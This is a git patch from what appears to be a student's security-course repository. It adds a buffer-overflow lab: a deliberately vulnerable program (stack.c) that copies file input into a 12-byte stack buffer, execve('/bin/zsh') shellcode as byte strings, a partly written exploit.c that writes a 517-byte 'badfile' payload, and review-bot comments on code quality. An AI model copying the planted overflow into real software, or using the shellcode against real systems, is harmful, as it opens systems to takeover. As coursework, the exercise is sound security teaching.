From 2f9a0e6b31751ee97ffcc9752b94391c383ff6f0 Mon Sep 17 00:00:00 2001
From: Alex Huddleston
Date: Mon, 12 Feb 2018 04:57:21 -0600
Subject: [PATCH] organizing. Initial hw2 commit.
---
ethernet_header.h => hw1/ethernet_header.h | 0
set_device.cpp => hw1/set_device.cpp | 0
sniffex.c => hw1/sniffex.c | 0
spoof.c => hw1/spoof.c | 0
test_filtering.cpp => hw1/test_filtering.cpp | 0
tfsession.pcap => hw1/tfsession.pcap | Bin
hw2/badfile | Bin 0 -> 517 bytes
hw2/call_shellcode.c | 27 +++++++++++++
hw2/exploit.c | 39 +++++++++++++++++++
hw2/shellcode.c | 9 +++++
hw2/stack.c | 27 +++++++++++++
11 files changed, 102 insertions(+)
rename ethernet_header.h => hw1/ethernet_header.h (100%)
rename set_device.cpp => hw1/set_device.cpp (100%)
rename sniffex.c => hw1/sniffex.c (100%)
rename spoof.c => hw1/spoof.c (100%)
rename test_filtering.cpp => hw1/test_filtering.cpp (100%)
rename tfsession.pcap => hw1/tfsession.pcap (100%)
create mode 100644 hw2/badfile
create mode 100755 hw2/call_shellcode.c
create mode 100755 hw2/exploit.c
create mode 100755 hw2/shellcode.c
create mode 100755 hw2/stack.c
diff --git a/ethernet_header.h b/hw1/ethernet_header.h
similarity index 100%
rename from ethernet_header.h
rename to hw1/ethernet_header.h
diff --git a/set_device.cpp b/hw1/set_device.cpp
similarity index 100%
rename from set_device.cpp
rename to hw1/set_device.cpp
diff --git a/sniffex.c b/hw1/sniffex.c
similarity index 100%
rename from sniffex.c
rename to hw1/sniffex.c
diff --git a/spoof.c b/hw1/spoof.c
similarity index 100%
rename from spoof.c
rename to hw1/spoof.c
diff --git a/test_filtering.cpp b/hw1/test_filtering.cpp
similarity index 100%
rename from test_filtering.cpp
rename to hw1/test_filtering.cpp
diff --git a/tfsession.pcap b/hw1/tfsession.pcap
similarity index 100%
rename from tfsession.pcap
rename to hw1/tfsession.pcap
diff --git a/hw2/badfile b/hw2/badfile
new file mode 100644
index 0000000000000000000000000000000000000000..d644f843d93a7fbe7189085c6f7ef985b858c7cc
GIT binary patch literal 517 mcmXp!5Rjo?Rh*HbpOl%``8XiB^Wn@5+-DmYCX9j+69NEeNFV0_ literal 0 HcmV?d00001
diff --git a/hw2/call_shellcode.c b/hw2/call_shellcode.c
new file mode 100755
index 0000000..bd777e8
--- /dev/null
+++ b/hw2/call_shellcode.c
@@ -0,0 +1,27 @@
+/* call_shellcode.c */
+/*A program that creates a file containing code for launching shell*/
+
+#include
+#include
+#include
+
+const char code[] =
+ "\x31\xc0" /* Line 1: xorl %eax,%eax */
+ "\x50" /* Line 2: pushl %eax */
+ "\x68""/zsh" /* Line 3: pushl $0x68732f2f */
+ "\x68""/bin" /* Line 4: pushl $0x6e69622f */
+ "\x89\xe3" /* Line 5: movl %esp,%ebx */
+ "\x50" /* Line 6: pushl %eax */
+ "\x53" /* Line 7: pushl %ebx */
+ "\x89\xe1" /* Line 8: movl %esp,%ecx */
+ "\x99" /* Line 9: cdql */
+ "\xb0\x0b" /* Line 10: movb $0x0b,%al */
+ "\xcd\x80" /* Line 11: int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+ char buf[sizeof(code)];
+ strcpy(buf, code);
+ ((void(*)( ))buf)( );
+}
diff --git a/hw2/exploit.c b/hw2/exploit.c
new file mode 100755
index 0000000..6f0c834
--- /dev/null
+++ b/hw2/exploit.c
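Review bot: In hw2/call_shellcode.c the header comment says the program "creates a file", but main() only copies `code` into a stack buffer and calls it; the sentence looks carried over from exploit.c and could read `/* Copies the shellcode into a stack buffer and calls it. */`. The operand comment on Line 3 is also out of step with the bytes: `"\x68""/zsh"` pushes 0x68737a2f, not the `$0x68732f2f` the comment gives, so I would write `/* Line 3: pushl $0x68737a2f ("/zsh") */`; hw2/exploit.c repeats the same stale comment. The call through `buf` presumably depends on the binary being built with an executable stack, which is worth stating in a comment next to the cast so a crash under default build settings is not mistaken for a bug.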
@@ -0,0 +1,39 @@
+/* exploit.c */
+
+/* A program that creates a file containing code for launching shell*/
+
+#include
+#include
+#include
+
+char shellcode[]=
+ "\x31\xc0" /* xorl %eax,%eax */
+ "\x50" /* pushl %eax */
+ "\x68""/zsh" /* pushl $0x68732f2f */
+ "\x68""/bin" /* pushl $0x6e69622f */
+ "\x89\xe3" /* movl %esp,%ebx */
+ "\x50" /* pushl %eax */
+ "\x53" /* pushl %ebx */
+ "\x89\xe1" /* movl %esp,%ecx */
+ "\x99" /* cdql */
+ "\xb0\x0b" /* movb $0x0b,%al */
+ "\xcd\x80" /* int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+ char buffer[517];
+ FILE *badfile;
+
+ /* Initialize buffer with 0x90 (NOP instruction) */
+ memset(&buffer, 0x90, 517);
+
+ /* You need to fill the buffer with appropriate contents here */
+ strcpy(buffer, shellcode);
+
+ /* Save the contents to the file "badfile" */
+ badfile = fopen("./badfile", "w");
+
+ fwrite(buffer, 517, 1, badfile);
+ fclose(badfile);
+}
diff --git a/hw2/shellcode.c b/hw2/shellcode.c
new file mode 100755
index 0000000..16367dc
--- /dev/null
+++ b/hw2/shellcode.c
@@ -0,0 +1,9 @@
+#include
+#include
+
+int main( ) {
+ char *name[2];
+ name[0] = "/bin/zsh";
+ name[1] = NULL;
+ execve(name[0], name, NULL);
+}
diff --git a/hw2/stack.c b/hw2/stack.c
new file mode 100755
index 0000000..4fba173
--- /dev/null
+++ b/hw2/stack.c
@@ -0,0 +1,27 @@
+/* stack.c */
+
+/* This program has a buffer overflow vulnerability. */
+/* Our task is to exploit this vulnerability */
+
+#include
+#include
+#include
+
+int bof(char *str)
+{
+ char buffer[12];
+ /* The following statement has a buffer overflow problem */
+ strcpy(buffer, str);
+ return 1;
+}
+
+void main(int argc, char **argv)
+{
+ char str[517];
+ FILE *badfile;
+ badfile = fopen("badfile", "r");
+ fread(str, sizeof(char), 517, badfile);
+ bof(str);
+ printf("Returned Properly\n");
+ return 1;
+}
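Review bot: In hw2/exploit.c the result of `fopen("./badfile", "w")` is handed to fwrite() and fclose() unchecked, so an unwritable working directory ends in a NULL stream dereference; add `if (badfile == NULL) { perror("fopen"); return 1; }` right after the call. The buffer holds raw bytes, so `"wb"` states the intent better than `"w"`. Using `sizeof buffer` in the memset() and fwrite() calls would keep the literal 517 from appearing three times and drifting apart.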
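Review bot: In hw2/shellcode.c nothing follows the execve() call, so when /bin/zsh is not installed the program ends silently with no indication that the exec failed; `perror("execve"); return 1;` after the call makes the failure visible. This is also the only one of the four new files without a header comment. Something like `/* shellcode.c: C form of the execve("/bin/zsh") call */` would match the others; whether it is meant as the reference for the byte string in call_shellcode.c is my reading of the two files, so confirm before wording it that way.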
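Review bot: In hw2/stack.c main() is declared `void` but ends with `return 1;`, which compilers diagnose; it should be `int main(int argc, char **argv)`. Apart from the overflow in bof() that the header comment declares intentional, main() has two unannounced problems: fopen() is unchecked, so a missing badfile passes NULL to fread(), and str is never NUL-terminated, so the strcpy() in bof() can read past its 517 bytes. `if (badfile == NULL) { perror("badfile"); return 1; }` and `size_t n = fread(str, 1, sizeof str - 1, badfile); str[n] = '\0';` cover both, and the stream is never closed. It would also help to extend the comment above the strcpy() with the bounded form used outside the exercise, e.g. `snprintf(buffer, sizeof buffer, "%s", str)`.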